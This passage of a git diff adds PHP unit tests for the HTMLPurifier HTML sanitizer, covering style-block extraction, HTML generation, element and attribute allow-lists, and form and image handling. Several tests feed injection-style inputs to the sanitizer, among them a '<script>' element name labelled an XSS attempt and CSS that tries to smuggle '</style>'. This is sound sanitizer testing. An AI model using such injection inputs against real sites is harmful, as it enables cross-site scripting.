HTMLPurifier_ErrorCollectorEMock(); + $this->collector->prepare($this->context); + $this->context->register('ErrorCollector', $this->collector); + $this->callCount = 0; + } + + protected function expectNoErrorCollection() { + $this->collector->expectNever('send'); + } + + protected function expectErrorCollection() { + $args = func_get_args(); + $this->collector->expectOnce('send', $args); + } + + protected function expectContext($key, $value) { + $this->collector->expectContext($key, $value); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php b/lib/htmlpurifier/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php new file mode 100644 index 000000000..3466d6aa2 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/Filter/ExtractStyleBlocksTest.php @@ -0,0 +1,231 @@ +<?php + +/** + * @todo Assimilate CSSTidy into our library + */ +class HTMLPurifier_Filter_ExtractStyleBlocksTest extends HTMLPurifier_Harness +{ + + // usual use case: + function test_tokenizeHTML_extractStyleBlocks() { + $this->config->set('Filter.ExtractStyleBlocks', true); + $purifier = new HTMLPurifier($this->config); + $result = $purifier->purify('<style type="text/css">.foo {text-align:center;bogus:remove-me;} body.class[foo="attr"] {text-align:right;}</style>Test<style>* {font-size:12pt;}</style>'); + $this->assertIdentical($result, 'Test'); + $this->assertIdentical($purifier->context->get('StyleBlocks'), + array( + ".foo {\ntext-align:center;\n}", + "* {\nfont-size:12pt;\n}" + ) + ); + } + + function assertExtractStyleBlocks($html, $expect = true, $styles = array()) { + $filter = new HTMLPurifier_Filter_ExtractStyleBlocks(); // disable cleaning + if ($expect === true) $expect = $html; + $this->config->set('Filter.ExtractStyleBlocks.TidyImpl', false); + $result = $filter->preFilter($html, $this->config, $this->context); + $this->assertIdentical($result, $expect); + $this->assertIdentical($this->context->get('StyleBlocks'), $styles); + } + + function test_extractStyleBlocks_preserve() { + $this->assertExtractStyleBlocks('Foobar'); + } + + function test_extractStyleBlocks_allStyle() { + $this->assertExtractStyleBlocks('<style>foo</style>', '', array('foo')); + } + + function test_extractStyleBlocks_multipleBlocks() { + $this->assertExtractStyleBlocks( + "<style>1</style><style>2</style>NOP<style>4</style>", + "NOP", + array('1', '2', '4') + ); + } + + function test_extractStyleBlocks_blockWithAttributes() { + $this->assertExtractStyleBlocks( + '<style type="text/css">css</style>', + '', + array('css') + ); + } + + function test_extractStyleBlocks_styleWithPadding() { + $this->assertExtractStyleBlocks( + "Alas<styled>Awesome</styled>\n<style>foo</style> Trendy!", + "Alas<styled>Awesome</styled>\n Trendy!", + array('foo') + ); + } + + function assertCleanCSS($input, $expect = true) { + $filter = new HTMLPurifier_Filter_ExtractStyleBlocks(); + if ($expect === true) $expect = $input; + $this->normalize($input); + $this->normalize($expect); + $result = $filter->cleanCSS($input, $this->config, $this->context); + $this->assertIdentical($result, $expect); + } + + function test_cleanCSS_malformed() { + $this->assertCleanCSS('</style>', ''); + } + + function test_cleanCSS_selector() { + $this->assertCleanCSS("a .foo #id div.cl#foo {\nfont-weight:700;\n}"); + } + + function test_cleanCSS_angledBrackets() { + // [Content] No longer can smuggle in angled brackets using + // font-family; when we add support for 'content', reinstate + // this test. + //$this->assertCleanCSS( + // ".class {\nfont-family:'</style>';\n}", + // ".class {\nfont-family:\"\\3C /style\\3E \";\n}" + //); + } + + function test_cleanCSS_angledBrackets2() { + // CSSTidy's behavior in this case is wrong, and should be fixed + //$this->assertCleanCSS( + // "span[title=\"</style>\"] {\nfont-size:12pt;\n}", + // "span[title=\"\\3C /style\\3E \"] {\nfont-size:12pt;\n}" + //); + } + + function test_cleanCSS_bogus() { + $this->assertCleanCSS("div {bogus:tree;}", "div {\n}"); + } + + /* [CONTENT] + function test_cleanCSS_escapeCodes() { + $this->assertCleanCSS( + ".class {\nfont-family:\"\\3C /style\\3E \";\n}" + ); + } + + function test_cleanCSS_noEscapeCodes() { + $this->config->set('Filter.ExtractStyleBlocks.Escaping', false); + $this->assertCleanCSS( + ".class {\nfont-family:\"</style>\";\n}" + ); + } + */ + + function test_cleanCSS_scope() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo'); + $this->assertCleanCSS( + "p {\ntext-indent:1em;\n}", + "#foo p {\ntext-indent:1em;\n}" + ); + } + + function test_cleanCSS_scopeWithSelectorCommas() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo'); + $this->assertCleanCSS( + "b, i {\ntext-decoration:underline;\n}", + "#foo b, #foo i {\ntext-decoration:underline;\n}" + ); + } + + function test_cleanCSS_scopeWithNaughtySelector() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo'); + $this->assertCleanCSS(" + p {\ntext-indent:1em;\n}", ''); + } + + function test_cleanCSS_scopeWithMultipleNaughtySelectors() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo'); + $this->assertCleanCSS(" ++ ++ p {\ntext-indent:1em;\n}", ''); + } + + function test_cleanCSS_scopeWithCommas() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo, .bar'); + $this->assertCleanCSS( + "p {\ntext-indent:1em;\n}", + "#foo p, .bar p {\ntext-indent:1em;\n}" + ); + } + + function test_cleanCSS_scopeAllWithCommas() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', '#foo, .bar'); + $this->assertCleanCSS( + "p, div {\ntext-indent:1em;\n}", + "#foo p, .bar p, #foo div, .bar div {\ntext-indent:1em;\n}" + ); + } + + function test_cleanCSS_scopeWithConflicts() { + $this->config->set('Filter.ExtractStyleBlocks.Scope', 'p'); + $this->assertCleanCSS( +"div { +text-align:right; +} + +p div { +text-align:left; +}", + +"p div { +text-align:right; +} + +p p div { +text-align:left; +}" + ); + } + + function test_removeComments() { + $this->assertCleanCSS( +"<!-- +div { +text-align:right; +} +-->", +"div { +text-align:right; +}" + ); + } + + function test_atSelector() { + $this->assertCleanCSS( +"{ + b { text-align: center; } +}", +"" + ); + } + + function test_selectorValidation() { + $this->assertCleanCSS( +"&, & { +text-align: center; +}", +"" + ); + $this->assertCleanCSS( +"&, b { +text-align:center; +}", +"b { +text-align:center; +}" + ); + $this->assertCleanCSS( +"& a #foo:hover.bar +b > i { +text-align:center; +}", +"a #foo:hover.bar + b \\3E i { +text-align:center; +}" + ); + $this->assertCleanCSS("doesnt-exist { text-align:center }", ""); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/GeneratorTest.php b/lib/htmlpurifier/tests/HTMLPurifier/GeneratorTest.php new file mode 100644 index 000000000..46b1dcf6b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/GeneratorTest.php @@ -0,0 +1,288 @@ +<?php + +class HTMLPurifier_GeneratorTest extends HTMLPurifier_Harness +{ + + /** + * Entity lookup table to help for a few tests. + */ + private $_entity_lookup; + + public function __construct() { + parent::__construct(); + $this->_entity_lookup = HTMLPurifier_EntityLookup::instance(); + } + + public function setUp() { + parent::setUp(); + $this->config->set('Output.Newline', "\n"); + } + + /** + * Creates a generator based on config and context member variables. + */ + protected function createGenerator() { + return new HTMLPurifier_Generator($this->config, $this->context); + } + + protected function assertGenerateFromToken($token, $html) { + $generator = $this->createGenerator(); + $result = $generator->generateFromToken($token); + $this->assertIdentical($result, $html); + } + + function test_generateFromToken_text() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Text('Foobar.<>'), + 'Foobar.<>' + ); + } + + function test_generateFromToken_startWithAttr() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Start('a', + array('href' => 'dyn?a=foo&b=bar') + ), + '<a href="dyn?a=foo&b=bar">' + ); + } + + function test_generateFromToken_end() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_End('b'), + '</b>' + ); + } + + function test_generateFromToken_emptyWithAttr() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Empty('br', + array('style' => 'font-family:"Courier New";') + ), + '<br style="font-family:"Courier New";" />' + ); + } + + function test_generateFromToken_startNoAttr() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Start('asdf'), + '<asdf>' + ); + } + + function test_generateFromToken_emptyNoAttr() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Empty('br'), + '<br />' + ); + } + + function test_generateFromToken_error() { + $this->expectError('Cannot generate HTML from non-HTMLPurifier_Token object'); + $this->assertGenerateFromToken( null, '' ); + } + + function test_generateFromToken_unicode() { + $theta_char = $this->_entity_lookup->table['theta']; + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Text($theta_char), + $theta_char + ); + } + + function test_generateFromToken_backtick() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Start('img', array('alt' => '`foo')), + '<img alt="`foo ">' + ); + } + + function test_generateFromToken_backtickDisabled() { + $this->config->set('Output.FixInnerHTML', false); + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Start('img', array('alt' => '`')), + '<img alt="`">' + ); + } + + function test_generateFromToken_backtickNoChange() { + $this->assertGenerateFromToken( + new HTMLPurifier_Token_Start('img', array('alt' => '`foo` bar')), + '<img alt="`foo` bar">' + ); + } + + function assertGenerateAttributes($attr, $expect, $element = false) { + $generator = $this->createGenerator(); + $result = $generator->generateAttributes($attr, $element); + $this->assertIdentical($result, $expect); + } + + function test_generateAttributes_blank() { + $this->assertGenerateAttributes(array(), ''); + } + + function test_generateAttributes_basic() { + $this->assertGenerateAttributes( + array('href' => 'dyn?a=foo&b=bar'), + 'href="dyn?a=foo&b=bar"' + ); + } + + function test_generateAttributes_doubleQuote() { + $this->assertGenerateAttributes( + array('style' => 'font-family:"Courier New";'), + 'style="font-family:"Courier New";"' + ); + } + + function test_generateAttributes_singleQuote() { + $this->assertGenerateAttributes( + array('style' => 'font-family:\'Courier New\';'), + 'style="font-family:\'Courier New\';"' + ); + } + + function test_generateAttributes_multiple() { + $this->assertGenerateAttributes( + array('src' => 'picture.jpg', 'alt' => 'Short & interesting'), + 'src="picture.jpg" alt="Short & interesting"' + ); + } + + function test_generateAttributes_specialChar() { + $theta_char = $this->_entity_lookup->table['theta']; + $this->assertGenerateAttributes( + array('title' => 'Theta is ' . $theta_char), + 'title="Theta is ' . $theta_char . '"' + ); + } + + + function test_generateAttributes_minimized() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Transitional'); + $this->assertGenerateAttributes( + array('compact' => 'compact'), 'compact', 'menu' + ); + } + + function test_generateFromTokens() { + + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('b'), + new HTMLPurifier_Token_Text('Foobar!'), + new HTMLPurifier_Token_End('b') + ), + '<b>Foobar!</b>' + ); + + } + + protected function assertGeneration($tokens, $expect) { + $generator = new HTMLPurifier_Generator($this->config, $this->context); + $result = $generator->generateFromTokens($tokens); + $this->assertIdentical($expect, $result); + } + + function test_generateFromTokens_Scripting() { + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('script'), + new HTMLPurifier_Token_Text('alert(3 < 5);'), + new HTMLPurifier_Token_End('script') + ), + "<script><!--//--><![CDATA[//><!--\nalert(3 < 5);\n//--><!]]></script>" + ); + } + + function test_generateFromTokens_Scripting_missingCloseTag() { + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('script'), + new HTMLPurifier_Token_Text('alert(3 < 5);'), + ), + "<script>alert(3 < 5);" + ); + } + + function test_generateFromTokens_Scripting_doubleBlock() { + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('script'), + new HTMLPurifier_Token_Text('alert(3 < 5);'), + new HTMLPurifier_Token_Text('foo();'), + new HTMLPurifier_Token_End('script') + ), + "<script>alert(3 < 5);foo();</script>" + ); + } + + function test_generateFromTokens_Scripting_disableWrapper() { + $this->config->set('Output.CommentScriptContents', false); + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('script'), + new HTMLPurifier_Token_Text('alert(3 < 5);'), + new HTMLPurifier_Token_End('script') + ), + "<script>alert(3 < 5);</script>" + ); + } + + function test_generateFromTokens_XHTMLoff() { + $this->config->set('HTML.XHTML', false); + + // omit trailing slash + $this->assertGeneration( + array( new HTMLPurifier_Token_Empty('br') ), + '<br>' + ); + + // there should be a test for attribute minimization, but it is + // impossible for something like that to happen due to our current + // definitions! fix it later + + // namespaced attributes must be dropped + $this->assertGeneration( + array( new HTMLPurifier_Token_Start('p', array('xml:lang'=>'fr')) ), + '<p>' + ); + + } + + function test_generateFromTokens_TidyFormat() { + // abort test if tidy isn't loaded + if (!extension_loaded('tidy')) return; + + // just don't test; Tidy is exploding on me. + return; + + $this->config->set('Core.TidyFormat', true); + $this->config->set('Output.Newline', "\n"); + + // nice wrapping please + $this->assertGeneration( + array( + new HTMLPurifier_Token_Start('div'), + new HTMLPurifier_Token_Text('Text'), + new HTMLPurifier_Token_End('div') + ), + "<div>\n Text\n</div>\n" + ); + + } + + function test_generateFromTokens_sortAttr() { + $this->config->set('Output.SortAttr', true); + + $this->assertGeneration( + array( new HTMLPurifier_Token_Start('p', array('b'=>'c', 'a'=>'d')) ), + '<p a="d" b="c">' + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLDefinitionTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLDefinitionTest.php new file mode 100644 index 000000000..6640cb0d0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLDefinitionTest.php @@ -0,0 +1,355 @@ +<?php + +class HTMLPurifier_HTMLDefinitionTest extends HTMLPurifier_Harness +{ + + function expectError($error = false, $message = '%s') { + // Because we're testing a definition, it's vital that the cache + // is turned off for tests that expect errors. + $this->config->set('Cache.DefinitionImpl', null); + parent::expectError($error); + } + + function test_parseTinyMCEAllowedList() { + + $def = new HTMLPurifier_HTMLDefinition(); + + // note: this is case-sensitive, but its config schema + // counterpart is not. This is generally a good thing for users, + // but it's a slight internal inconsistency + + $this->assertEqual( + $def->parseTinyMCEAllowedList(''), + array(array(), array()) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList('a,b,c'), + array(array('a' => true, 'b' => true, 'c' => true), array()) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList('a[x|y|z]'), + array(array('a' => true), array('a.x' => true, 'a.y' => true, 'a.z' => true)) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList('*[id]'), + array(array(), array('*.id' => true)) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList('a[*]'), + array(array('a' => true), array('a.*' => true)) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList('span[style],strong,a[href|title]'), + array(array('span' => true, 'strong' => true, 'a' => true), + array('span.style' => true, 'a.href' => true, 'a.title' => true)) + ); + + $this->assertEqual( + // alternate form: + $def->parseTinyMCEAllowedList( +'span[style] +strong +a[href|title] +'), + $val = array(array('span' => true, 'strong' => true, 'a' => true), + array('span.style' => true, 'a.href' => true, 'a.title' => true)) + ); + + $this->assertEqual( + $def->parseTinyMCEAllowedList(' span [ style ], strong'."\n\t".'a[href | title]'), + $val + ); + + } + + function test_Allowed() { + + $config1 = HTMLPurifier_Config::create(array( + 'HTML.AllowedElements' => array('b', 'i', 'p', 'a'), + 'HTML.AllowedAttributes' => array('a@href', '*@id') + )); + + $config2 = HTMLPurifier_Config::create(array( + 'HTML.Allowed' => 'b,i,p,a[href],*[id]' + )); + + $this->assertEqual($config1->getHTMLDefinition(), $config2->getHTMLDefinition()); + + } + + function assertPurification_AllowedElements_p() { + $this->assertPurification('<p><b>Jelly</b></p>', '<p>Jelly</p>'); + } + + function test_AllowedElements() { + $this->config->set('HTML.AllowedElements', 'p'); + $this->assertPurification_AllowedElements_p(); + } + + function test_AllowedElements_multiple() { + $this->config->set('HTML.AllowedElements', 'p,div'); + $this->assertPurification('<div><p><b>Jelly</b></p></div>', '<div><p>Jelly</p></div>'); + } + + function test_AllowedElements_invalidElement() { + $this->config->set('HTML.AllowedElements', 'obviously_invalid,p'); + $this->expectError(new PatternExpectation("/Element 'obviously_invalid' is not supported/")); + $this->assertPurification_AllowedElements_p(); + } + + function test_AllowedElements_invalidElement_xssAttempt() { + $this->config->set('HTML.AllowedElements', '<script>,p'); + $this->expectError(new PatternExpectation("/Element '<script>' is not supported/")); + $this->assertPurification_AllowedElements_p(); + } + + function test_AllowedElements_multipleInvalidElements() { + $this->config->set('HTML.AllowedElements', 'dr-wiggles,dr-pepper,p'); + $this->expectError(new PatternExpectation("/Element 'dr-wiggles' is not supported/")); + $this->expectError(new PatternExpectation("/Element 'dr-pepper' is not supported/")); + $this->assertPurification_AllowedElements_p(); + } + + function assertPurification_AllowedAttributes_global_style() { + $this->assertPurification( + '<p style="font-weight:bold;" class="foo">Jelly</p><br style="clear:both;" />', + '<p style="font-weight:bold;">Jelly</p><br style="clear:both;" />'); + } + + function test_AllowedAttributes_global_preferredSyntax() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'style'); + $this->assertPurification_AllowedAttributes_global_style(); + } + + function test_AllowedAttributes_global_verboseSyntax() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', '*@style'); + $this->assertPurification_AllowedAttributes_global_style(); + } + + function test_AllowedAttributes_global_discouragedSyntax() { + // Emit errors eventually + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', '*.style'); + $this->assertPurification_AllowedAttributes_global_style(); + } + + function assertPurification_AllowedAttributes_local_p_style() { + $this->assertPurification( + '<p style="font-weight:bold;" class="foo">Jelly</p><br style="clear:both;" />', + '<p style="font-weight:bold;">Jelly</p><br />'); + } + + function test_AllowedAttributes_local_preferredSyntax() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p@style'); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_AllowedAttributes_local_discouragedSyntax() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p.style'); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_AllowedAttributes_multiple() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p@style,br@class,title'); + $this->assertPurification( + '<p style="font-weight:bold;" class="foo" title="foo">Jelly</p><br style="clear:both;" class="foo" title="foo" />', + '<p style="font-weight:bold;" title="foo">Jelly</p><br class="foo" title="foo" />' + ); + } + + function test_AllowedAttributes_local_invalidAttribute() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', array('p@style', 'p@<foo>')); + $this->expectError(new PatternExpectation("/Attribute '<foo>' in element 'p' not supported/")); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_AllowedAttributes_global_invalidAttribute() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', array('style', '<foo>')); + $this->expectError(new PatternExpectation("/Global attribute '<foo>' is not supported in any elements/")); + $this->assertPurification_AllowedAttributes_global_style(); + } + + function test_AllowedAttributes_local_invalidAttributeDueToMissingElement() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p.style,foo.style'); + $this->expectError(new PatternExpectation("/Cannot allow attribute 'style' if element 'foo' is not allowed\/supported/")); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_AllowedAttributes_duplicate() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p.style,p@style'); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_AllowedAttributes_multipleErrors() { + $this->config->set('HTML.AllowedElements', array('p', 'br')); + $this->config->set('HTML.AllowedAttributes', 'p.style,foo.style,<foo>'); + $this->expectError(new PatternExpectation("/Cannot allow attribute 'style' if element 'foo' is not allowed\/supported/")); + $this->expectError(new PatternExpectation("/Global attribute '<foo>' is not supported in any elements/")); + $this->assertPurification_AllowedAttributes_local_p_style(); + } + + function test_ForbiddenElements() { + $this->config->set('HTML.ForbiddenElements', 'b'); + $this->assertPurification('<b>b</b><i>i</i>', 'b<i>i</i>'); + } + + function test_ForbiddenElements_invalidElement() { + $this->config->set('HTML.ForbiddenElements', 'obviously_incorrect'); + // no error! + $this->assertPurification('<i>i</i>'); + } + + function assertPurification_ForbiddenAttributes_b_style() { + $this->assertPurification( + '<b style="float:left;">b</b><i style="float:left;">i</i>', + '<b>b</b><i style="float:left;">i</i>'); + } + + function test_ForbiddenAttributes() { + $this->config->set('HTML.ForbiddenAttributes', 'b@style'); + $this->assertPurification_ForbiddenAttributes_b_style(); + } + + function test_ForbiddenAttributes_incorrectSyntax() { + $this->config->set('HTML.ForbiddenAttributes', 'b.style'); + $this->expectError("Error with b.style: tag.attr syntax not supported for HTML.ForbiddenAttributes; use tag@attr instead"); + $this->assertPurification('<b style="float:left;">Test</b>'); + } + + function test_ForbiddenAttributes_incorrectGlobalSyntax() { + $this->config->set('HTML.ForbiddenAttributes', '*.style'); + $this->expectError("Error with *.style: *.attr syntax not supported for HTML.ForbiddenAttributes; use attr instead"); + $this->assertPurification('<b style="float:left;">Test</b>'); + } + + function assertPurification_ForbiddenAttributes_style() { + $this->assertPurification( + '<b class="foo" style="float:left;">b</b><i style="float:left;">i</i>', + '<b class="foo">b</b><i>i</i>'); + } + + function test_ForbiddenAttributes_global() { + $this->config->set('HTML.ForbiddenAttributes', 'style'); + $this->assertPurification_ForbiddenAttributes_style(); + } + + function test_ForbiddenAttributes_globalVerboseFormat() { + $this->config->set('HTML.ForbiddenAttributes', '*@style'); + $this->assertPurification_ForbiddenAttributes_style(); + } + + function test_addAttribute() { + + $config = HTMLPurifier_Config::createDefault(); + $def = $config->getHTMLDefinition(true); + $def->addAttribute('span', 'custom', 'Enum#attribute'); + + $purifier = new HTMLPurifier($config); + $input = '<span custom="attribute">Custom!</span>'; + $output = $purifier->purify($input); + $this->assertIdentical($input, $output); + + } + + function test_addAttribute_multiple() { + + $config = HTMLPurifier_Config::createDefault(); + $def = $config->getHTMLDefinition(true); + $def->addAttribute('span', 'custom', 'Enum#attribute'); + $def->addAttribute('span', 'foo', 'Text'); + + $purifier = new HTMLPurifier($config); + $input = '<span custom="attribute" foo="asdf">Custom!</span>'; + $output = $purifier->purify($input); + $this->assertIdentical($input, $output); + + } + + function test_addElement() { + + $config = HTMLPurifier_Config::createDefault(); + $def = $config->getHTMLDefinition(true); + $def->addElement('marquee', 'Inline', 'Inline', 'Common', array('width' => 'Length')); + + $purifier = new HTMLPurifier($config); + $input = '<span><marquee width="50">Foobar</marquee></span>'; + $output = $purifier->purify($input); + $this->assertIdentical($input, $output); + + } + + function test_injector() { + generate_mock_once('HTMLPurifier_Injector'); + $injector = new HTMLPurifier_InjectorMock(); + $injector->name = 'MyInjector'; + $injector->setReturnValue('checkNeeded', false); + + $module = $this->config->getHTMLDefinition(true)->getAnonymousModule(); + $module->info_injector[] = $injector; + + $this->assertIdentical($this->config->getHTMLDefinition()->info_injector, + array( + 'MyInjector' => $injector, + ) + ); + } + + function test_injectorMissingNeeded() { + generate_mock_once('HTMLPurifier_Injector'); + $injector = new HTMLPurifier_InjectorMock(); + $injector->name = 'MyInjector'; + $injector->setReturnValue('checkNeeded', 'a'); + + $module = $this->config->getHTMLDefinition(true)->getAnonymousModule(); + $module->info_injector[] = $injector; + + $this->assertIdentical($this->config->getHTMLDefinition()->info_injector, + array() + ); + } + + function test_injectorIntegration() { + $module = $this->config->getHTMLDefinition(true)->getAnonymousModule(); + $module->info_injector[] = 'Linkify'; + + $this->assertIdentical( + $this->config->getHTMLDefinition()->info_injector, + array('Linkify' => new HTMLPurifier_Injector_Linkify()) + ); + } + + function test_injectorIntegrationFail() { + $this->config->set('HTML.Allowed', 'p'); + + $module = $this->config->getHTMLDefinition(true)->getAnonymousModule(); + $module->info_injector[] = 'Linkify'; + + $this->assertIdentical( + $this->config->getHTMLDefinition()->info_injector, + array() + ); + } + + function test_notAllowedRequiredAttributeError() { + $this->expectError("Required attribute 'src' in element 'img' was not allowed, which means 'img' will not be allowed either"); + $this->config->set('HTML.Allowed', 'img[alt]'); + $this->config->getHTMLDefinition(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/FormsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/FormsTest.php new file mode 100644 index 000000000..5bc4c99c3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/FormsTest.php @@ -0,0 +1,155 @@ +<?php + +class HTMLPurifier_HTMLModule_FormsTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Trusted', true); + $this->config->set('Attr.EnableID', true); + } + + function testBasicUse() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult( // need support for label for later + ' +<form action="http://somesite.com/prog/adduser" method="post"> + <p> + <label>First name: </label> + <input type="text" id="firstname" /><br /> + <label>Last name: </label> + <input type="text" id="lastname" /><br /> + <label>email: </label> + <input type="text" id="email" /><br /> + <input type="radio" name="sex" value="Male" /> Male<br /> + <input type="radio" name="sex" value="Female" /> Female<br /> + <input type="submit" value="Send" /> <input type="reset" /> + </p> +</form>' + ); + } + + function testSelectOption() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult(' +<form action="http://somesite.com/prog/component-select" method="post"> + <p> + <select multiple="multiple" size="4" name="component-select"> + <option selected="selected" value="Component_1_a">Component_1</option> + <option selected="selected" value="Component_1_b">Component_2</option> + <option>Component_3</option> + <option>Component_4</option> + <option>Component_5</option> + <option>Component_6</option> + <option>Component_7</option> + </select> + <input type="submit" value="Send" /><input type="reset" /> + </p> +</form> + '); + } + + function testSelectOptgroup() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult(' +<form action="http://somesite.com/prog/someprog" method="post"> +<p> + <select name="ComOS"> + <option selected="selected" label="none" value="none">None</option> + <optgroup label="PortMaster 3"> + <option label="3.7.1" value="pm3_3.7.1">PortMaster 3 with ComOS 3.7.1</option> + <option label="3.7" value="pm3_3.7">PortMaster 3 with ComOS 3.7</option> + <option label="3.5" value="pm3_3.5">PortMaster 3 with ComOS 3.5</option> + </optgroup> + <optgroup label="PortMaster 2"> + <option label="3.7" value="pm2_3.7">PortMaster 2 with ComOS 3.7</option> + <option label="3.5" value="pm2_3.5">PortMaster 2 with ComOS 3.5</option> + </optgroup> + <optgroup label="IRX"> + <option label="3.7R" value="IRX_3.7R">IRX with ComOS 3.7R</option> + <option label="3.5R" value="IRX_3.5R">IRX with ComOS 3.5R</option> + </optgroup> + </select> +</p> +</form> + '); + } + + function testTextarea() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult(' +<form action="http://somesite.com/prog/text-read" method="post"> + <p> + <textarea name="thetext" rows="20" cols="80"> + First line of initial text. + Second line of initial text. + </textarea> + <input type="submit" value="Send" /><input type="reset" /> + </p> +</form> + '); + } + + // label tests omitted + + function testFieldset() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult(' +<form action="..." method="post"> + <fieldset> + <legend>Personal Information</legend> + Last Name: <input name="personal_lastname" type="text" tabindex="1" /> + First Name: <input name="personal_firstname" type="text" tabindex="2" /> + Address: <input name="personal_address" type="text" tabindex="3" /> + ...more personal information... + </fieldset> + <fieldset> + <legend>Medical History</legend> + <input name="history_illness" type="checkbox" value="Smallpox" tabindex="20" />Smallpox + <input name="history_illness" type="checkbox" value="Mumps" tabindex="21" /> Mumps + <input name="history_illness" type="checkbox" value="Dizziness" tabindex="22" /> Dizziness + <input name="history_illness" type="checkbox" value="Sneezing" tabindex="23" /> Sneezing + ...more medical history... + </fieldset> + <fieldset> + <legend>Current Medication</legend> + Are you currently taking any medication? + <input name="medication_now" type="radio" value="Yes" tabindex="35" />Yes + <input name="medication_now" type="radio" value="No" tabindex="35" />No + + If you are currently taking medication, please indicate + it in the space below: + <textarea name="current_medication" rows="20" cols="50" tabindex="40"></textarea> + </fieldset> +</form> + '); + } + + function testInputTransform() { + $this->config->set('HTML.Doctype', 'XHTML 1.0 Strict'); + $this->assertResult('<input type="checkbox" />', '<input type="checkbox" value="" />'); + } + + function testTextareaTransform() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult('<textarea></textarea>', '<textarea cols="22" rows="3"></textarea>'); + } + + function testTextInFieldset() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult('<fieldset> <legend></legend>foo</fieldset>'); + } + + function testStrict() { + $this->config->set('HTML.Doctype', 'HTML 4.01 Strict'); + $this->assertResult('<form action=""></form>', ''); + } + + function testLegacy() { + $this->assertResult('<form action=""></form>'); + $this->assertResult('<form action=""><input align="left" /></form>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ImageTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ImageTest.php new file mode 100644 index 000000000..30e36f1d1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ImageTest.php @@ -0,0 +1,55 @@ +<?php + +class HTMLPurifier_HTMLModule_ImageTest extends HTMLPurifier_HTMLModuleHarness +{ + + + function testNormal() { + $this->assertResult('<img height="40" width="40" src="" alt="" />'); + } + + function testLengthTooLarge() { + $this->assertResult( + '<img height="40000" width="40000" src="" alt="" />', + '<img height="1200" width="1200" src="" alt="" />' + ); + } + + function testLengthPercentage() { + $this->assertResult( + '<img height="100%" width="100%" src="" alt="" />', + '<img src="" alt="" />' + ); + } + + function testLengthCustomMax() { + $this->config->set('HTML.MaxImgLength', 20); + 